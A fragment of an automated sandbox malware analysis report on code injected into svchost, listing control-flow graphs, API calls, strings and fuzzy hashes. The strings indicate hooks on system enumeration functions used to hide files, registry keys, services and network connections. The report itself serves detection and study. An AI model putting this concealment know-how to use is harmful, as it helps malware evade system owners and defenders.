14753->14754 14754->14750 14755->14713 14756->14715 14757->14717 14758->14719 14760 1f2bd161327 GetProcessHeap HeapAlloc 14759->14760 14761 1f2bd16148a RegCloseKey 14759->14761 14762 1f2bd161476 GetProcessHeap HeapFree 14760->14762 14763 1f2bd161352 RegEnumValueW 14760->14763 14761->14724 14762->14761 14764 1f2bd1613a5 14763->14764 14764->14762 14764->14763 14766 1f2bd1613d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14764->14766 14767 1f2bd16141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14764->14767 14773 1f2bd16152c 14764->14773 14766->14767 14767->14764 14769 1f2bd1611b5 RegCloseKey 14768->14769 14771 1f2bd1610bf 14768->14771 14769->14727 14770 1f2bd1610cf RegEnumValueW 14770->14771 14771->14769 14771->14770 14772 1f2bd16114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14771->14772 14772->14771 14774 1f2bd16157c 14773->14774 14777 1f2bd161546 14773->14777 14774->14764 14775 1f2bd161565 StrCmpW 14775->14777 14776 1f2bd16155d StrCmpIW 14776->14777 14777->14774 14777->14775 14777->14776

                                                                      Executed Functions

                                                                      Function 000001F2BD16328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: b8f2d5d8970c08e30104490078ba1f72add17956867f785404ba5962f5222235
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: 02118078A30A4382FB609B61F8393F923E4B754B45FD88238ED06815B1EF79C044C203
                                                                      Function 000001F2BD161ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001F2BD161628: GetProcessHeap.KERNEL32 ref: 000001F2BD161633
                                                                        • Part of subcall function 000001F2BD161628: HeapAlloc.KERNEL32 ref: 000001F2BD161642
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616B2
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616DF
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1616F9
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161719
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161734
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161754
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16176F
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16178F
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617AA
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1617CA
                                                                      • Sleep.KERNEL32 ref: 000001F2BD161AD7
                                                                      • SleepEx.KERNELBASE ref: 000001F2BD161ADD
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617E5
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161805
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161820
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161840
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16185B
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16187B
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161896
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1618A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: dbf663d1485315679b68e8288550e8b7b0c6c51f1b1d89a94094fb3e67a57733
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 7731B97922464382EB509B26EA713F973B5AB85BC0F985835DE0A87695FF34C8D18312
                                                                      Function 000001F2BD163844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 57 1f2bd163844-1f2bd16384f 58 1f2bd163869-1f2bd163870 57->58 59 1f2bd163851-1f2bd163864 StrCmpNIW 57->59 59->58 60 1f2bd163866 59->60 60->58
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dialer
                                                                      • API String ID: 0-3528709123
                                                                      • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction ID: 3aac585823334c127dda7282b47a4669109186ccc3810c2214bda50ad0b13ecd
                                                                      • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction Fuzzy Hash: 81D05EB43216078AFB549FE698E46F02354AB08744FCC4134CD0441160DB38898DE611
                                                                      Function 000001F2BD13273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574440743.000001F2BD130000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD130000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd130000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 5a31c6780180920593c79de93fd5a78e32e1db436847973b0c6c9579bd3f76a4
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: CB61EF32B216A297EF54AF1590207FDB3A2FB54BA4F98C131DE5907788DA38D852C701

                                                                      Non-executed Functions

                                                                      Function 000001F2BD162B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 355 1f2bd162b2c-1f2bd162ba5 call 1f2bd182ce0 358 1f2bd162ee0-1f2bd162f03 355->358 359 1f2bd162bab-1f2bd162bb1 355->359 359->358 360 1f2bd162bb7-1f2bd162bba 359->360 360->358 361 1f2bd162bc0-1f2bd162bc3 360->361 361->358 362 1f2bd162bc9-1f2bd162bd9 GetModuleHandleA 361->362 363 1f2bd162bed 362->363 364 1f2bd162bdb-1f2bd162beb GetProcAddress 362->364 365 1f2bd162bf0-1f2bd162c0e 363->365 364->365 365->358 367 1f2bd162c14-1f2bd162c33 StrCmpNIW 365->367 367->358 368 1f2bd162c39-1f2bd162c3d 367->368 368->358 369 1f2bd162c43-1f2bd162c4d 368->369 369->358 370 1f2bd162c53-1f2bd162c5a 369->370 370->358 371 1f2bd162c60-1f2bd162c73 370->371 372 1f2bd162c75-1f2bd162c81 371->372 373 1f2bd162c83 371->373 374 1f2bd162c86-1f2bd162c8a 372->374 373->374 375 1f2bd162c8c-1f2bd162c98 374->375 376 1f2bd162c9a 374->376 377 1f2bd162c9d-1f2bd162ca7 375->377 376->377 378 1f2bd162d9d-1f2bd162da1 377->378 379 1f2bd162cad-1f2bd162cb0 377->379 382 1f2bd162da7-1f2bd162daa 378->382 383 1f2bd162ed2-1f2bd162eda 378->383 380 1f2bd162cc2-1f2bd162ccc 379->380 381 1f2bd162cb2-1f2bd162cbf call 1f2bd16199c 379->381 385 1f2bd162d00-1f2bd162d0a 380->385 386 1f2bd162cce-1f2bd162cdb 380->386 381->380 387 1f2bd162dac-1f2bd162db8 call 1f2bd16199c 382->387 388 1f2bd162dbb-1f2bd162dc5 382->388 383->358 383->371 393 1f2bd162d0c-1f2bd162d19 385->393 394 1f2bd162d3a-1f2bd162d3d 385->394 386->385 392 1f2bd162cdd-1f2bd162cea 386->392 387->388 389 1f2bd162dc7-1f2bd162dd4 388->389 390 1f2bd162df5-1f2bd162df8 388->390 389->390 399 1f2bd162dd6-1f2bd162de3 389->399 400 1f2bd162e05-1f2bd162e12 lstrlenW 390->400 401 1f2bd162dfa-1f2bd162e03 call 1f2bd161bbc 390->401 402 1f2bd162ced-1f2bd162cf3 392->402 393->394 403 1f2bd162d1b-1f2bd162d28 393->403 396 1f2bd162d3f-1f2bd162d49 call 1f2bd161bbc 394->396 397 1f2bd162d4b-1f2bd162d58 lstrlenW 394->397 396->397 410 1f2bd162d93-1f2bd162d98 396->410 405 1f2bd162d5a-1f2bd162d64 397->405 406 1f2bd162d7b-1f2bd162d8d call 1f2bd163844 397->406 407 1f2bd162de6-1f2bd162dec 399->407 411 1f2bd162e14-1f2bd162e1e 400->411 412 1f2bd162e35-1f2bd162e3f call 1f2bd163844 400->412 401->400 418 1f2bd162e4a-1f2bd162e55 401->418 409 1f2bd162cf9-1f2bd162cfe 402->409 402->410 413 1f2bd162d2b-1f2bd162d31 403->413 405->406 416 1f2bd162d66-1f2bd162d79 call 1f2bd16152c 405->416 406->410 421 1f2bd162e42-1f2bd162e44 406->421 417 1f2bd162dee-1f2bd162df3 407->417 407->418 409->385 409->402 410->421 411->412 422 1f2bd162e20-1f2bd162e33 call 1f2bd16152c 411->422 412->421 413->410 423 1f2bd162d33-1f2bd162d38 413->423 416->406 416->410 417->390 417->407 425 1f2bd162e57-1f2bd162e5b 418->425 426 1f2bd162ecc-1f2bd162ed0 418->426 421->383 421->418 422->412 422->418 423->394 423->413 430 1f2bd162e63-1f2bd162e7d call 1f2bd1685c0 425->430 431 1f2bd162e5d-1f2bd162e61 425->431 426->383 434 1f2bd162e80-1f2bd162e83 430->434 431->430 431->434 437 1f2bd162ea6-1f2bd162ea9 434->437 438 1f2bd162e85-1f2bd162ea3 call 1f2bd1685c0 434->438 437->426 440 1f2bd162eab-1f2bd162ec9 call 1f2bd1685c0 437->440 438->437 440->426
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 107207480c6beedcfac9e10622a0404f813cce9df297bff4ecca76f0d2a71204
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 16B18D7A231A9386EB69CF25D4607F963A5FB44B94F845036EE4953B94EF35CC80C342
                                                                      Function 000001F2BD167D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 2191b91c7ae414d5341e28445c4bdcd7f9ae6a593b554c58698db7f92569058a
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: AB314F76215B828AEBA49F60E8607FD7364F784748F84443ADE4D57B98EF38C548C711
                                                                      Function 000001F2BD1612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 630f6eb47bae6733bdbe7fb6a2d06b5e13df8154db8fa66121e5b802eb99e1ef
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: C6515BB6220B8686EB54CF62E4683EA77A1F789B99F844134DE4907B29DF3CC445C701
                                                                      Function 000001F2BD161D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 44394e3bb61418d90b21b3d16070fd92066106fc5670cf8bb63d378dec672435
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: F5318CB9635A4BA0EB05EBAAE8716F42321B705394FC05073EC1D135B6AF78828DC352
                                                                      Function 000001F2BD16A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 574 1f2bd16a544-1f2bd16a5ac call 1f2bd16b414 577 1f2bd16a5b2-1f2bd16a5b5 574->577 578 1f2bd16aa13-1f2bd16aa1b call 1f2bd16c748 574->578 577->578 579 1f2bd16a5bb-1f2bd16a5c1 577->579 581 1f2bd16a5c7-1f2bd16a5cb 579->581 582 1f2bd16a690-1f2bd16a6a2 579->582 581->582 586 1f2bd16a5d1-1f2bd16a5dc 581->586 584 1f2bd16a6a8-1f2bd16a6ac 582->584 585 1f2bd16a963-1f2bd16a967 582->585 584->585 587 1f2bd16a6b2-1f2bd16a6bd 584->587 589 1f2bd16a969-1f2bd16a970 585->589 590 1f2bd16a9a0-1f2bd16a9aa call 1f2bd169634 585->590 586->582 588 1f2bd16a5e2-1f2bd16a5e7 586->588 587->585 593 1f2bd16a6c3-1f2bd16a6ca 587->593 588->582 594 1f2bd16a5ed-1f2bd16a5f7 call 1f2bd169634 588->594 589->578 591 1f2bd16a976-1f2bd16a99b call 1f2bd16aa1c 589->591 590->578 600 1f2bd16a9ac-1f2bd16a9cb call 1f2bd167940 590->600 591->590 597 1f2bd16a894-1f2bd16a8a0 593->597 598 1f2bd16a6d0-1f2bd16a707 call 1f2bd169a10 593->598 594->600 608 1f2bd16a5fd-1f2bd16a628 call 1f2bd169634 * 2 call 1f2bd169d24 594->608 597->590 601 1f2bd16a8a6-1f2bd16a8aa 597->601 598->597 612 1f2bd16a70d-1f2bd16a715 598->612 605 1f2bd16a8ac-1f2bd16a8b8 call 1f2bd169ce4 601->605 606 1f2bd16a8ba-1f2bd16a8c2 601->606 605->606 621 1f2bd16a8db-1f2bd16a8e3 605->621 606->590 611 1f2bd16a8c8-1f2bd16a8d5 call 1f2bd1698b4 606->611 642 1f2bd16a648-1f2bd16a652 call 1f2bd169634 608->642 643 1f2bd16a62a-1f2bd16a62e 608->643 611->590 611->621 617 1f2bd16a719-1f2bd16a74b 612->617 618 1f2bd16a887-1f2bd16a88e 617->618 619 1f2bd16a751-1f2bd16a75c 617->619 618->597 618->617 619->618 623 1f2bd16a762-1f2bd16a77b 619->623 624 1f2bd16a8e9-1f2bd16a8ed 621->624 625 1f2bd16a9f6-1f2bd16aa12 call 1f2bd169634 * 2 call 1f2bd16c6a8 621->625 627 1f2bd16a874-1f2bd16a879 623->627 628 1f2bd16a781-1f2bd16a7c6 call 1f2bd169cf8 * 2 623->628 629 1f2bd16a900 624->629 630 1f2bd16a8ef-1f2bd16a8fe call 1f2bd169ce4 624->630 625->578 633 1f2bd16a884 627->633 655 1f2bd16a7c8-1f2bd16a7ee call 1f2bd169cf8 call 1f2bd16ac38 628->655 656 1f2bd16a804-1f2bd16a80a 628->656 638 1f2bd16a903-1f2bd16a90d call 1f2bd16b4ac 629->638 630->638 633->618 638->590 653 1f2bd16a913-1f2bd16a961 call 1f2bd169944 call 1f2bd169b50 638->653 642->582 659 1f2bd16a654-1f2bd16a674 call 1f2bd169634 * 2 call 1f2bd16b4ac 642->659 643->642 647 1f2bd16a630-1f2bd16a63b 643->647 647->642 652 1f2bd16a63d-1f2bd16a642 647->652 652->578 652->642 653->590 675 1f2bd16a815-1f2bd16a872 call 1f2bd16a470 655->675 676 1f2bd16a7f0-1f2bd16a802 655->676 663 1f2bd16a80c-1f2bd16a810 656->663 664 1f2bd16a87b 656->664 680 1f2bd16a676-1f2bd16a680 call 1f2bd16b59c 659->680 681 1f2bd16a68b 659->681 663->628 665 1f2bd16a880 664->665 665->633 675->665 676->655 676->656 684 1f2bd16a686-1f2bd16a9ef call 1f2bd1692ac call 1f2bd16aff4 call 1f2bd1694a0 680->684 685 1f2bd16a9f0-1f2bd16a9f5 call 1f2bd16c6a8 680->685 681->582 684->685 685->625
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: d5e0ca40e81d9d4a17391a4d0fb4706baa6880c7b00ec249b536ae7b7c49b8b2
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: BDE1F57A621B838AEB20DF65D4603FD77A4F744B98F900126EF8957B9ACB34D481C706
                                                                      Function 000001F2BD16F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 695 1f2bd16f394-1f2bd16f3e6 696 1f2bd16f4d7 695->696 697 1f2bd16f3ec-1f2bd16f3ef 695->697 700 1f2bd16f4d9-1f2bd16f4f5 696->700 698 1f2bd16f3f9-1f2bd16f3fc 697->698 699 1f2bd16f3f1-1f2bd16f3f4 697->699 701 1f2bd16f402-1f2bd16f411 698->701 702 1f2bd16f4bc-1f2bd16f4cf 698->702 699->700 703 1f2bd16f413-1f2bd16f416 701->703 704 1f2bd16f421-1f2bd16f440 LoadLibraryExW 701->704 702->696 707 1f2bd16f516-1f2bd16f525 GetProcAddress 703->707 708 1f2bd16f41c 703->708 705 1f2bd16f4f6-1f2bd16f50b 704->705 706 1f2bd16f446-1f2bd16f44f GetLastError 704->706 705->707 709 1f2bd16f50d-1f2bd16f510 FreeLibrary 705->709 711 1f2bd16f496-1f2bd16f4a0 706->711 712 1f2bd16f451-1f2bd16f468 call 1f2bd16c928 706->712 713 1f2bd16f527-1f2bd16f54e 707->713 714 1f2bd16f4b5 707->714 710 1f2bd16f4a8-1f2bd16f4af 708->710 709->707 710->701 710->714 711->710 712->711 717 1f2bd16f46a-1f2bd16f47e call 1f2bd16c928 712->717 713->700 714->702 717->711 720 1f2bd16f480-1f2bd16f494 LoadLibraryExW 717->720 720->705 720->711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: dee3e0f77a7f950d99e87eba1c700eb07d10c10f3303d0f797124f3aba53c511
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 1241DE76336A0381EB16CB66A8247F52395FB49BE0F894139DD0A87B99EE38C445C352
                                                                      Function 000001F2BD16104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 721 1f2bd16104c-1f2bd1610b9 RegQueryInfoKeyW 722 1f2bd1611b5-1f2bd1611d0 721->722 723 1f2bd1610bf-1f2bd1610c9 721->723 723->722 724 1f2bd1610cf-1f2bd16111f RegEnumValueW 723->724 725 1f2bd1611a5-1f2bd1611af 724->725 726 1f2bd161125-1f2bd16112a 724->726 725->722 725->724 726->725 727 1f2bd16112c-1f2bd161135 726->727 728 1f2bd161147-1f2bd16114c 727->728 729 1f2bd161137 727->729 731 1f2bd161199-1f2bd1611a3 728->731 732 1f2bd16114e-1f2bd161193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 728->732 730 1f2bd16113b-1f2bd16113f 729->730 730->725 733 1f2bd161141-1f2bd161145 730->733 731->725 732->731 733->728 733->730
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 4129ac803274aa25b024b198ef83d0f7a517cdb801d32a117a9186af29447f03
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: 9D4171B7224B86C6E7A0CF61E4543EE77A1F389B98F448129DE8907B58DF38C485CB01
                                                                      Function 000001F2BD16D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 43319ffa0c7ee914352e92ba5d38087bee9b4dd8faa5ceab62ab6c6d6a778b8b
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 4611D03872528341FB68A7755A713F923416B443F0FA84734ED3D066EADE78C442A303
                                                                      Function 000001F2BD167510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 96eb2be9ce1bb00abb2c46e894f9b4b09165b72cda165d31dba4d8d7e2e0f222
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: E981C37973064386FB50AB65A4713F96390A785780FD88535EE0847FAEEB78C845C723
                                                                      Function 000001F2BD169DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
